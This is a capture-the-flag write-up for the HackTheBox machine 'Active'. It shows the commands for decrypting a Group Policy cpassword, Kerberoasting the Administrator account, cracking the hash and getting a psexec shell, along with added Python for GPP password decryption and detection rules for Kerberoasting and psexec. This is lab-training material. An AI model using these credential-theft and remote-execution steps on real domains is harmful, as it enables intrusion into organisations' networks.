HTB - Active Writeup - 10.10.10.100
Active is a 30 point medium rated machine on HackTheBox. It involved locating a Groups.xml file and decrypting the cpassword inside to get user. Root required the use of GetUserSPNs.py to get the TGT of the Admin user, who had a service principal name set, and finally psexec.py to gain an admin shell.
To start this box off we will do an nmap scan of the target machine, 10.10.10.100:
nmap -sC -sV -oA nmap/active 10.10.10.100
Nmap Scan Results
# Nmap 7.80 scan initiated Wed Apr 29 12:08:45 2020 as: nmap -sC -sV -oA nmap/active 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.056s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-04-29 11:10:12Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
There are a few things to note here: firstly we have Kerberos (port 88), LDAP (port 389), RPC (port 135) and SMB on port 445. This tells us that this machine is probably an Active Directory domain controller, if it was not already obvious from the machine's name.
Firstly, we will start by listing SMB shares using anonymous credentials:
smbclient -L \\\\10.10.10.100\\ -U ""
From this we can see an unusual share, Replication. Let's try and view the contents of this share.
Now to explore the Replication share, we will use smbclient again:
As you can see, we can access the share using anonymous login. Now we can download all the files using the following commands:
The file of note here is the Groups.xml file. This file is used by a Windows service called Group Policy Preferences, which allows domain admins to roll out passwords for local Administrators over Group Policy. The decryption key was leaked, so now any password located inside a Groups.xml file can be decrypted. You can read more about this here at adsecurity.org.
Inside the Groups.xml file we see:
The cpassword string is the encrypted password for the user.
Decrypting the cpassword
Kali has a built in utility called gpp-decrypt which will decrypt the cpassword string; you can read more about this tool here.
Now to decrypt the cpassword string from before we can type:
We now have the credentials of the user SVC_TGS:GPPstillStandingStrong2k18 and we can attempt to connect to the Users SMB share to grab
smbclient \\\\10.10.10.100\\Users -U svc_tgs
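The Groups.xml weakness above is worth seeing as code, because the same check is what a defender runs against their own SYSVOL to find leftover GPP passwords. The following is an added example written for this writeup, not code from the original post or from gpp-decrypt: it walks a directory (such as the downloaded Replication share) for the Group Policy Preference files that can carry a cpassword attribute, reports every account that has one set, and, optionally, decrypts a value using the AES-256 key Microsoft published in MS-GPPREF (the "leaked key" the text refers to). The sample Groups.xml and the placeholder cpassword value are constructed for the example; the decrypt function assumes the third-party cryptography package is installed, everything else is standard library.

```python
import base64
import os
import xml.etree.ElementTree as ET
from typing import Dict, Iterator, List

# Group Policy Preference XML files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# AES-256 key published by Microsoft in MS-GPPREF section 2.2.1.1.4. Because the
# key is public, a cpassword is only obfuscated, never protected.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

# Constructed sample Groups.xml (not the file from the box). The cpassword value
# is a labelled placeholder, not real ciphertext, so do not feed it to decrypt.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD_BASE64" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
  <User name="guest" changed="2018-07-18 20:47:00">
    <Properties action="U" acctDisabled="1" userName="guest"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text: str, path: str = "<inline>") -> List[Dict[str, str]]:
    """Return one record per <Properties> element that carries a cpassword."""
    hits = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cpw = props.get("cpassword")
        if cpw is None:
            continue
        hits.append({
            "file": path,
            # Groups.xml uses userName; Services/ScheduledTasks use accountName/runAs.
            "account": (props.get("userName") or props.get("accountName")
                        or props.get("runAs") or ""),
            "cpassword": cpw,
        })
    return hits


def scan_tree(root_dir: str) -> Iterator[Dict[str, str]]:
    """Walk a SYSVOL copy (or the downloaded Replication share) for GPP files."""
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:
                    yield from find_cpasswords(fh.read(), full)


def pad_base64(cpassword: str) -> str:
    """GPP strips the '=' padding from the base64 text; restore it before decoding."""
    return cpassword + "=" * (-len(cpassword) % 4)


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC, all-zero IV, PKCS#7 padding, UTF-16-LE plaintext (MS-GPPREF).

    Needs the third-party 'cryptography' package (assumed installed); it is
    imported here so the audit functions above work without it.
    """
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    ciphertext = base64.b64decode(pad_base64(cpassword))
    if not ciphertext:  # an empty cpassword means an empty password was set
        return ""
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    return padded[:-padded[-1]].decode("utf-16-le")


if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{hit['file']}: account {hit['account']!r} has a cpassword set")
```

Run against a real SYSVOL copy with `for hit in scan_tree("/path/to/Policies"): ...`; any hit at all is the finding, since the fix is to remove the preference item and rotate the account, not to pick a stronger password.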
4. Privesc to Domain Admin
Service Principal Names (SPNs)
Our user account SVC_TGS is able to find service principal names associated with user accounts in the domain. You could have worked this out by having a look at the username and seeing the TGS string at the end, which signifies that this account may be able to see SPNs. Through this we are able to get the krb5-tgt of the Administrator account using a tool called GetUserSPNs.py from the Impacket repo on GitHub. If you want to know more about this attack I will leave a link to an ADSecurity article here.
Getting the TGT of the Admin User
The syntax for this command is as follows:
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -request -dc-ip 10.10.10.100
-dc-ip is the IP of the domain controller, 10.10.10.100
-request means that we want to request the TGT of any user that has an SPN
Bingo!! We can now take this TGT to John the Ripper to crack.
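What GetUserSPNs.py -request actually hands back is a service ticket (a TGS, not a TGT) for each user account with an SPN, encrypted with that account's password hash, which is why it can be cracked offline and why John's format tag is $krb5tgs$23$ (etype 23, RC4-HMAC). On the domain controller each request is one Security log event 4769, so the activity is detectable. The code below is an added example for this writeup, not from the original post or from Impacket: it runs two Kerberoast detection rules over a constructed key=value export of 4769 events, flagging RC4-encrypted service tickets for user-account SPNs and any requester that asks for several distinct user SPNs within a short window. The sample events, the extra service accounts (sqlsvc, websvc) and the IP addresses are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = "0x17"            # etype 23, the type behind a $krb5tgs$23$ hash
AES_TYPES = {"0x11", "0x12"}  # AES128 / AES256, what a modern domain should issue

# Constructed sample export of Security log events as key=value lines (not real
# log data from the box). svc_tgs requests RC4 tickets for three user-account
# SPNs within two seconds; jdoe shows normal AES-backed activity.
SAMPLE_EVENTS = """\
Time=2020-04-29T11:12:01 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0
Time=2020-04-29T11:12:01 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0
Time=2020-04-29T11:12:02 EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=websvc TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0
Time=2020-04-29T11:15:40 EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.20 Status=0x0
Time=2020-04-29T11:16:02 EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.20 Status=0x0
Time=2020-04-29T11:20:00 EventID=4768 TargetUserName=jdoe@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.20 Status=0x0
"""


def parse_events(text: str) -> List[Dict[str, str]]:
    """Parse key=value lines; values in this export contain no spaces."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]


def is_user_spn(service_name: str) -> bool:
    """Computer accounts ($) and krbtgt are not roastable; user-account SPNs are."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def successful_tgs_requests(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Successful 4769 (TGS request) events for user-account service principals."""
    return [e for e in events
            if e["EventID"] == "4769" and e["Status"] == "0x0"
            and is_user_spn(e["ServiceName"])]


def rc4_service_tickets(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rule 1: an RC4 ticket for a user SPN means the requester downgraded the
    etype (or the account is RC4-only), either way the ticket is cheap to crack."""
    return [e for e in successful_tgs_requests(events)
            if e["TicketEncryptionType"] == RC4_HMAC]


def burst_requesters(events: List[Dict[str, str]],
                     window: timedelta = timedelta(seconds=60),
                     threshold: int = 3) -> Dict[str, List[str]]:
    """Rule 2: one account requesting >= threshold distinct user SPNs within window."""
    by_user: Dict[str, List] = defaultdict(list)
    for e in successful_tgs_requests(events):
        by_user[e["TargetUserName"]].append(
            (datetime.fromisoformat(e["Time"]), e["ServiceName"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for start, _ in reqs:  # slide a window from each request
            in_window = {svc for t, svc in reqs if start <= t <= start + window}
            if len(in_window) >= threshold:
                flagged[user] = sorted(in_window)
                break
    return flagged


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    for e in rc4_service_tickets(evts):
        print(f"RC4 TGS: {e['TargetUserName']} -> {e['ServiceName']} from {e['IpAddress']}")
    for user, spns in burst_requesters(evts).items():
        print(f"burst: {user} requested {len(spns)} user SPNs: {', '.join(spns)}")
```

Rule 1 only has value once the domain's service accounts support AES (msDS-SupportedEncryptionTypes), otherwise every 4769 is RC4 and the rule is noise; rule 2 works regardless and is the better first alert in a legacy domain.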
Cracking the TGT
We will use John the Ripper to crack the TGT, first by placing it in a file named admin.hash and then running the following command to run it against the rockyou.txt wordlist:
john -w=/usr/share/wordlists/rockyou.txt admin.hash
This gives us the credentials:
Now that we have the admin credentials we can use the psexec.py script from Impacket to gain a shell. If you would like to know more about the psexec.py script you can have a look here.
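psexec.py gets its shell by writing a service executable into the ADMIN$ share (the Windows directory) and registering it as a service over RPC, so on the target every run leaves a System log event 7045 ("A service was installed in the system") whose ImagePath points at a binary sitting directly in the Windows root, under a random letter-string name. The following is an added example for this writeup, not code from the original post or from Impacket: it scans a constructed JSON-lines export of 7045 events and flags installs whose binary lives directly in the Windows root or is reached via an ADMIN$ UNC path, plus the fixed PSEXESVC name used by Sysinternals PsExec. Service names, paths and timestamps in the sample are made up; the Windows root location is assumed to be the default C:\Windows.

```python
import json
import ntpath
import re
from typing import Dict, List

WINDOWS_ROOT = r"C:\Windows"   # what the ADMIN$ share maps to on a default install

# Constructed sample: System log 7045 ("A service was installed") events exported
# as JSON lines. Names and paths are made up for the example, not taken from the
# box. The first two are what a psexec-style tool leaves behind: a binary dropped
# straight into the Windows root with a random letter-string name, and the
# well-known Sysinternals PSEXESVC. The last two are ordinary Windows services.
SAMPLE_7045 = r"""
{"Time": "2020-04-29T11:40:12", "EventID": 7045, "ServiceName": "hDkX", "ImagePath": "%SystemRoot%\\cYgZrTbQ.exe", "AccountName": "LocalSystem"}
{"Time": "2020-04-29T11:41:03", "EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"}
{"Time": "2020-04-29T09:02:55", "EventID": 7045, "ServiceName": "Sense", "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\"", "AccountName": "LocalSystem"}
{"Time": "2020-04-29T09:03:10", "EventID": 7045, "ServiceName": "wuauserv", "ImagePath": "C:\\Windows\\System32\\svchost.exe -k netsvcs", "AccountName": "LocalSystem"}
"""


def parse_events(text: str) -> List[Dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def normalize_image_path(image_path: str) -> str:
    """Reduce an ImagePath to the bare executable: drop quotes and arguments and
    expand %SystemRoot% / %windir%, so directory comparisons are reliable."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:].split('"', 1)[0]      # quoted path, args follow the quote
    else:
        path = path.split(" ", 1)[0]          # unquoted path, args after first space
    # a lambda avoids re.sub treating the backslashes in C:\Windows as escapes
    return re.sub(r"%(systemroot|windir)%", lambda _m: WINDOWS_ROOT, path,
                  flags=re.IGNORECASE)


def suspicious_reasons(event: Dict) -> List[str]:
    """Return why a 7045 event looks like a remote-exec service install (empty if not)."""
    path = normalize_image_path(event["ImagePath"])
    directory, binary = ntpath.split(path)
    reasons = []
    # Legitimate services live in System32 or Program Files, not in the Windows
    # root itself; a binary there was almost certainly written through ADMIN$.
    if directory.rstrip("\\").lower() == WINDOWS_ROOT.lower():
        reasons.append("service binary sits directly in the Windows root (ADMIN$)")
    if re.match(r"^\\\\[^\\]+\\ADMIN\$\\", path, re.IGNORECASE):
        reasons.append("ImagePath is a UNC path into ADMIN$")
    if event["ServiceName"].upper() == "PSEXESVC" or binary.upper() == "PSEXESVC.EXE":
        reasons.append("Sysinternals PsExec service/binary name")
    return reasons


def flag_service_installs(events: List[Dict]) -> List[Dict]:
    """Filter to 7045 events with at least one reason, keeping the evidence."""
    flagged = []
    for e in events:
        if e.get("EventID") != 7045:
            continue
        reasons = suspicious_reasons(e)
        if reasons:
            flagged.append({"Time": e["Time"], "ServiceName": e["ServiceName"],
                            "ImagePath": e["ImagePath"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in flag_service_installs(parse_events(SAMPLE_7045)):
        print(f"{hit['Time']} {hit['ServiceName']} {hit['ImagePath']}: "
              + "; ".join(hit["reasons"]))
```

Pair this with Security event 4697 (the same install recorded by the Security log when auditing is enabled) and with the 5145 share-access events for ADMIN$ from the same source address to get the full sequence: file write, service create, service start.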
If you enjoyed my write up or found it useful please check out my htb profile linked below and give a +rep